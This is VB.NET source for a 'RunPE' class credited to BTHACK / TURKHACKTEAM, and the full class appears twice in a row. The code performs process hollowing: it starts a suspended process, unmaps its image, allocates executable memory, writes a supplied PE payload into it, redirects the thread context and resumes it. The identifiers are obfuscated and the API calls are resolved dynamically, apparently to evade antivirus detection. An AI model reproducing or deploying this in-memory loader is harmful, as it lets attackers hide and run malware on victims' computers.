'''' <summary>
'''' Author : By BTHACK RunPE Generator - TURKHACKTEAM
'''' BTHACK
'''' Call : Dim x AS New bBSPVHwDpLP: x.zqCnGZIPFA( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>
Public Class bBSPVHwDpLP
Public Declare Function WZeLWj Lib "kernel32" Alias "LoadLibraryA" (ByVal YKGx As String) As IntPtr
Public Declare Function TMZULn Lib "kernel32" Alias "GetProcAddress" (ByVal BWVr As IntPtr, ByVal YKGx As String) As IntPtr
Function uHIqxlaqHojZnQO(Of T)(ByVal YKGx As String, ByVal EnZz As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(TMZULn(WZeLWj(YKGx), EnZz), GetType(T)), Object), T)
End Function
Delegate Function HBnBpz(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function FhSXtB(ByVal vptW As IntPtr, ByVal eCgz As IntPtr) As UInteger
Delegate Function uOQRmM(ByVal vptW As IntPtr, ByVal eCgz As IntPtr, ByRef bufr As IntPtr, ByVal bufrQydqpqTah As Integer, ByRef PMaV As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function HGnRjz(ByVal ojKead As IntPtr, ByVal GNut As IntPtr) As UInteger
Delegate Function LAdpVu(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function alkChg(ByVal vptW As IntPtr, ByVal mqNu As IntPtr, ByVal QydqpqTah As IntPtr, ByVal VDW As Integer, ByVal irXG As Integer) As IntPtr
Delegate Function fYKnha(ByVal vptWess As IntPtr, ByVal jkQesXZAx As IntPtr, ByVal yOOQ As Byte(), ByVal nQydqpqTah As UInteger, ByVal JvnRkwMdN As Integer) As Boolean
Public Declare Auto Function vAAOHL Lib "kernel32" Alias "CreateProcessW" (ByVal erhS As String, ByVal MEUu As StringBuilder, ByVal kWsQRvaGq As IntPtr, ByVal Zsre As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal pQio As Boolean, ByVal VtCq As Integer, ByVal DGoS As IntPtr, ByVal QtMC As String, ByVal gRCM As Byte(), ByVal MuWN As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function iwXWbxm(ByVal lKlZhVN As Long, Optional ByVal fjRfQBE As Long = &H4) As Integer
Dim Vrtevkc As IntPtr
Dim CTDVndk As Integer
Dim KZkk As uOQRmM = uHIqxlaqHojZnQO(Of uOQRmM)("ntdll", "NtReadVirtualMemory")
Call KZkk(Process.GetCurrentProcess.Handle, lKlZhVN, Vrtevkc, fjRfQBE, CTDVndk)
Return Vrtevkc
End Function
Public Function zqCnGZIPFA(ByVal xaVIxIlj As Byte(), ByVal rjwHDOey As String) As Boolean
Try
Dim YWNpfici As GCHandle = GCHandle.Alloc(xaVIxIlj, GCHandleType.Pinned) : Dim hModuleBase As Integer = YWNpfici.AddrOfPinnedObject : YWNpfici.Free()
Dim kWsQRvaGq As IntPtr = IntPtr.Zero
Dim eqZHGbhBl As IntPtr() = New IntPtr(3) {}
Dim vptWYkkde As Byte() = New Byte(67) {}
Dim cLFwWeIcU As Integer = BitConverter.ToInt32(xaVIxIlj, 60)
Dim hEnJMzIud As Integer
Dim kXAcNWTnt As UInteger() = New UInteger(178) {}
kXAcNWTnt(0) = &H10002
vAAOHL(Nothing, New StringBuilder(rjwHDOey), kWsQRvaGq, kWsQRvaGq, False, 4, kWsQRvaGq, Nothing, vptWYkkde, eqZHGbhBl)
Dim MEUuTTklx As Integer = (hModuleBase + iwXWbxm(hModuleBase + &H3C))
hEnJMzIud = iwXWbxm(MEUuTTklx + &H34)
Dim Wwsvp As FhSXtB = uHIqxlaqHojZnQO(Of FhSXtB)("ntdll", "NtUnmapViewOfSection")
Wwsvp(eqZHGbhBl(0), hEnJMzIud)
Dim CZLwd As alkChg = uHIqxlaqHojZnQO(Of alkChg)("kernel32", "VirtualAllocEx")
Dim jkQesXZAx As IntPtr = CZLwd(eqZHGbhBl(0), hEnJMzIud, iwXWbxm(MEUuTTklx + &H50), &H3000, &H40)
Dim gWCclyHG As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + &H34))
Dim QydqpqTah As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + 80))
Dim LbPnPUdjh As Integer
Dim JvnRkwMdN As Integer
Dim api8 As fYKnha = uHIqxlaqHojZnQO(Of fYKnha)("ntdll", "NtWriteVirtualMemory")
api8(eqZHGbhBl(0), jkQesXZAx, xaVIxIlj, CUInt(CInt(iwXWbxm(MEUuTTklx + &H54))), LbPnPUdjh)
For i = 0 To iwXWbxm(MEUuTTklx + &H6, 2) - 1
Dim zachgJXW As Integer() = New Integer(9) {}
Buffer.BlockCopy(xaVIxIlj, (cLFwWeIcU + &HF8) + (i * 40), zachgJXW, 0, 40)
Dim TrBXElfLc As Byte() = New Byte((zachgJXW(4) - 1)) {}
Buffer.BlockCopy(xaVIxIlj, zachgJXW(5), TrBXElfLc, 0, TrBXElfLc.Length)
QydqpqTah = New IntPtr(jkQesXZAx.ToInt32() + zachgJXW(3))
gWCclyHG = New IntPtr(TrBXElfLc.Length)
api8(eqZHGbhBl(0), QydqpqTah, TrBXElfLc, CUInt(gWCclyHG), JvnRkwMdN)
Next i
Dim COEEt As HBnBpz = uHIqxlaqHojZnQO(Of HBnBpz)("ntdll", "NtGetContextThread")
COEEt(eqZHGbhBl(1), kXAcNWTnt)
api8(eqZHGbhBl(0), kXAcNWTnt(41) + &H8, BitConverter.GetBytes(jkQesXZAx.ToInt32()), CUInt(&H4), JvnRkwMdN)
kXAcNWTnt(&H2C) = hEnJMzIud + iwXWbxm(MEUuTTklx + &H28)
Dim shnwH As LAdpVu = uHIqxlaqHojZnQO(Of LAdpVu)("ntdll", "NtSetContextThread")
shnwH(eqZHGbhBl(1), kXAcNWTnt)
Dim hQuBw As HGnRjz = uHIqxlaqHojZnQO(Of HGnRjz)("ntdll", "NtResumeThread")
hQuBw(eqZHGbhBl(1), 0)
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class
'''' Author : By BTHACK RunPE Generator - TURKHACKTEAM
'''' BTHACK
'''' Call : Dim x AS New bBSPVHwDpLP: x.zqCnGZIPFA( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>
Public Class bBSPVHwDpLP
Public Declare Function WZeLWj Lib "kernel32" Alias "LoadLibraryA" (ByVal YKGx As String) As IntPtr
Public Declare Function TMZULn Lib "kernel32" Alias "GetProcAddress" (ByVal BWVr As IntPtr, ByVal YKGx As String) As IntPtr
Function uHIqxlaqHojZnQO(Of T)(ByVal YKGx As String, ByVal EnZz As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(TMZULn(WZeLWj(YKGx), EnZz), GetType(T)), Object), T)
End Function
Delegate Function HBnBpz(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function FhSXtB(ByVal vptW As IntPtr, ByVal eCgz As IntPtr) As UInteger
Delegate Function uOQRmM(ByVal vptW As IntPtr, ByVal eCgz As IntPtr, ByRef bufr As IntPtr, ByVal bufrQydqpqTah As Integer, ByRef PMaV As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function HGnRjz(ByVal ojKead As IntPtr, ByVal GNut As IntPtr) As UInteger
Delegate Function LAdpVu(ByVal ojK As IntPtr, ByVal kXAcNWTnt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function alkChg(ByVal vptW As IntPtr, ByVal mqNu As IntPtr, ByVal QydqpqTah As IntPtr, ByVal VDW As Integer, ByVal irXG As Integer) As IntPtr
Delegate Function fYKnha(ByVal vptWess As IntPtr, ByVal jkQesXZAx As IntPtr, ByVal yOOQ As Byte(), ByVal nQydqpqTah As UInteger, ByVal JvnRkwMdN As Integer) As Boolean
Public Declare Auto Function vAAOHL Lib "kernel32" Alias "CreateProcessW" (ByVal erhS As String, ByVal MEUu As StringBuilder, ByVal kWsQRvaGq As IntPtr, ByVal Zsre As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal pQio As Boolean, ByVal VtCq As Integer, ByVal DGoS As IntPtr, ByVal QtMC As String, ByVal gRCM As Byte(), ByVal MuWN As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function iwXWbxm(ByVal lKlZhVN As Long, Optional ByVal fjRfQBE As Long = &H4) As Integer
Dim Vrtevkc As IntPtr
Dim CTDVndk As Integer
Dim KZkk As uOQRmM = uHIqxlaqHojZnQO(Of uOQRmM)("ntdll", "NtReadVirtualMemory")
Call KZkk(Process.GetCurrentProcess.Handle, lKlZhVN, Vrtevkc, fjRfQBE, CTDVndk)
Return Vrtevkc
End Function
Public Function zqCnGZIPFA(ByVal xaVIxIlj As Byte(), ByVal rjwHDOey As String) As Boolean
Try
Dim YWNpfici As GCHandle = GCHandle.Alloc(xaVIxIlj, GCHandleType.Pinned) : Dim hModuleBase As Integer = YWNpfici.AddrOfPinnedObject : YWNpfici.Free()
Dim kWsQRvaGq As IntPtr = IntPtr.Zero
Dim eqZHGbhBl As IntPtr() = New IntPtr(3) {}
Dim vptWYkkde As Byte() = New Byte(67) {}
Dim cLFwWeIcU As Integer = BitConverter.ToInt32(xaVIxIlj, 60)
Dim hEnJMzIud As Integer
Dim kXAcNWTnt As UInteger() = New UInteger(178) {}
kXAcNWTnt(0) = &H10002
vAAOHL(Nothing, New StringBuilder(rjwHDOey), kWsQRvaGq, kWsQRvaGq, False, 4, kWsQRvaGq, Nothing, vptWYkkde, eqZHGbhBl)
Dim MEUuTTklx As Integer = (hModuleBase + iwXWbxm(hModuleBase + &H3C))
hEnJMzIud = iwXWbxm(MEUuTTklx + &H34)
Dim Wwsvp As FhSXtB = uHIqxlaqHojZnQO(Of FhSXtB)("ntdll", "NtUnmapViewOfSection")
Wwsvp(eqZHGbhBl(0), hEnJMzIud)
Dim CZLwd As alkChg = uHIqxlaqHojZnQO(Of alkChg)("kernel32", "VirtualAllocEx")
Dim jkQesXZAx As IntPtr = CZLwd(eqZHGbhBl(0), hEnJMzIud, iwXWbxm(MEUuTTklx + &H50), &H3000, &H40)
Dim gWCclyHG As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + &H34))
Dim QydqpqTah As New IntPtr(BitConverter.ToInt32(xaVIxIlj, cLFwWeIcU + 80))
Dim LbPnPUdjh As Integer
Dim JvnRkwMdN As Integer
Dim api8 As fYKnha = uHIqxlaqHojZnQO(Of fYKnha)("ntdll", "NtWriteVirtualMemory")
api8(eqZHGbhBl(0), jkQesXZAx, xaVIxIlj, CUInt(CInt(iwXWbxm(MEUuTTklx + &H54))), LbPnPUdjh)
For i = 0 To iwXWbxm(MEUuTTklx + &H6, 2) - 1
Dim zachgJXW As Integer() = New Integer(9) {}
Buffer.BlockCopy(xaVIxIlj, (cLFwWeIcU + &HF8) + (i * 40), zachgJXW, 0, 40)
Dim TrBXElfLc As Byte() = New Byte((zachgJXW(4) - 1)) {}
Buffer.BlockCopy(xaVIxIlj, zachgJXW(5), TrBXElfLc, 0, TrBXElfLc.Length)
QydqpqTah = New IntPtr(jkQesXZAx.ToInt32() + zachgJXW(3))
gWCclyHG = New IntPtr(TrBXElfLc.Length)
api8(eqZHGbhBl(0), QydqpqTah, TrBXElfLc, CUInt(gWCclyHG), JvnRkwMdN)
Next i
Dim COEEt As HBnBpz = uHIqxlaqHojZnQO(Of HBnBpz)("ntdll", "NtGetContextThread")
COEEt(eqZHGbhBl(1), kXAcNWTnt)
api8(eqZHGbhBl(0), kXAcNWTnt(41) + &H8, BitConverter.GetBytes(jkQesXZAx.ToInt32()), CUInt(&H4), JvnRkwMdN)
kXAcNWTnt(&H2C) = hEnJMzIud + iwXWbxm(MEUuTTklx + &H28)
Dim shnwH As LAdpVu = uHIqxlaqHojZnQO(Of LAdpVu)("ntdll", "NtSetContextThread")
shnwH(eqZHGbhBl(1), kXAcNWTnt)
Dim hQuBw As HGnRjz = uHIqxlaqHojZnQO(Of HGnRjz)("ntdll", "NtResumeThread")
hQuBw(eqZHGbhBl(1), 0)
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class